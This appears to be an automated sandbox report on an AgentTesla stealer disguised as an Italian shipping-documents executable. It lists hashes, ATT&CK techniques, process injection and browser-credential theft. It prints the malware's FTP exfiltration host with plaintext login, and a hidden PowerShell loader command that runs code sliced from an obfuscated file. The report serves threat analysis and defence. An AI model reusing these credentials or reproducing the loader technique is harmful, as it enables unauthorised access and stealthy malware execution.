agenttesla | 0c7379c634b68fbaa5ad8fdf354986e14b8aab92b408b6a759f55dbb45291def

General

Target

Documenti di spedizione 0002838844.exe
Size

695KB
MD5

2505793cd3edee5e7ceab9359a8a74ba
SHA1

30437e6082392072f27fd3609e6aac5d161c45a8
SHA256

8cce7f3f93f7d317da18beb13332f1ad601c4552022d07d7e28d1d836eedba81
SHA512

58f4dd9082ed1b7721030f1f7ac74bdb7878153081839d13ebf0027ea9d47cfb198d9cad97645b915a981442716979b7ef48e751e13f69f0a7bcf7e0aab2a2ba
SSDEEP

6144:JpkXchsEnW7+8WIEZb8Qj+iHK5sDlK+f+gsw8XuMEbHdLP7LoMg//YgNfegoWK2E:YvWIKbnKiHEsM60Z/Y8emeFFwP0nRUq

Score

10^/10

agenttesla credential_access discovery execution keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: ftp
Host:
ftp://ftp.concaribe.com
Port:
21
Username:
[email protected]
Password:
ro}UWgz#!38E

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2748	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
5	api.ipify.org
6	api.ipify.org

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2612	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2748	powershell.exe
2612	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2748 set thread context of 2612	2748	powershell.exe	33

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Documenti di spedizione 0002838844.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wab.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
2748	powershell.exe
2612	wab.exe
2612	wab.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
2748	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2612	wab.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2652 wrote to memory of 2748	2652	Documenti di spedizione 0002838844.exe	30
PID 2652 wrote to memory of 2748	2652	Documenti di spedizione 0002838844.exe	30
PID 2652 wrote to memory of 2748	2652	Documenti di spedizione 0002838844.exe	30
PID 2652 wrote to memory of 2748	2652	Documenti di spedizione 0002838844.exe	30
PID 2748 wrote to memory of 2612	2748	powershell.exe	33
PID 2748 wrote to memory of 2612	2748	powershell.exe	33
PID 2748 wrote to memory of 2612	2748	powershell.exe	33
PID 2748 wrote to memory of 2612	2748	powershell.exe	33
PID 2748 wrote to memory of 2612	2748	powershell.exe	33
PID 2748 wrote to memory of 2612	2748	powershell.exe	33

C:\Users\Admin\AppData\Local\Temp\Documenti di spedizione 0002838844.exe
"C:\Users\Admin\AppData\Local\Temp\Documenti di spedizione 0002838844.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -windowstyle hidden "$sharping=Get-Content 'C:\Users\Admin\AppData\Local\Konfektionernes\Segment.Sam';$qatars=$sharping.SubString(43606,3);.$qatars($sharping)
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2748
- - C:\Program Files (x86)\windows mail\wab.exe
    "C:\Program Files (x86)\windows mail\wab.exe"
    3⤵
    - Suspicious use of NtCreateThreadExHideFromDebugger
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2612

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Konfektionernes\Downtick.Tro

Filesize
314KB

MD5
2b5e89cf7067591109b0a73fa6d9973d

SHA1
e924969e07bd57b5c6ac1a4a1d20928b666804a0

SHA256
ef05ff4d95cfb33089e1d6aede4157989fee552e6e0e59fd653300876bc32d14

SHA512
11905db895f3b2a764fa96d4b01ff18d29032b36ac1da1312e6e0f20749c8287f552b26a37f4e054041081c341b8c472b90bf7185c04b2fc61b88b23427c11a7

Download Submit
C:\Users\Admin\AppData\Local\Konfektionernes\Segment.Sam

Filesize
53KB

MD5
bc4900725d3d13feb8409643ec5b42a8

SHA1
13e40afed666594caf9bfee6f07f4bc9039c04e7

SHA256
6741b125848e3a2ec6665e467bf819de8d9dd0a7cddd5642bcc64f6acadd8dc8

SHA512
732b2751117b41979c216685aa4211453e180c641fa85cac2a76ce56e802734a3257dddd3731c5801c0c1063ed933f9e89be7a956b586051cde5d3ff940518d1

Download Submit
memory/2612-17-0x0000000000790000-0x00000000017F2000-memory.dmp

Filesize
16.4MB

Download
memory/2612-18-0x0000000000790000-0x00000000007D2000-memory.dmp

Filesize
264KB

Download
memory/2748-7-0x0000000073981000-0x0000000073982000-memory.dmp

Filesize
4KB

Download
memory/2748-10-0x0000000073980000-0x0000000073F2B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-9-0x0000000073980000-0x0000000073F2B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-8-0x0000000073980000-0x0000000073F2B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-12-0x0000000073980000-0x0000000073F2B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-14-0x0000000073980000-0x0000000073F2B000-memory.dmp

Filesize
5.7MB

Download
memory/2748-15-0x00000000067E0000-0x00000000092F5000-memory.dmp

Filesize
43.1MB

Download
memory/2748-16-0x0000000073980000-0x0000000073F2B000-memory.dmp

Filesize
5.7MB

Download

Analysis

Sharing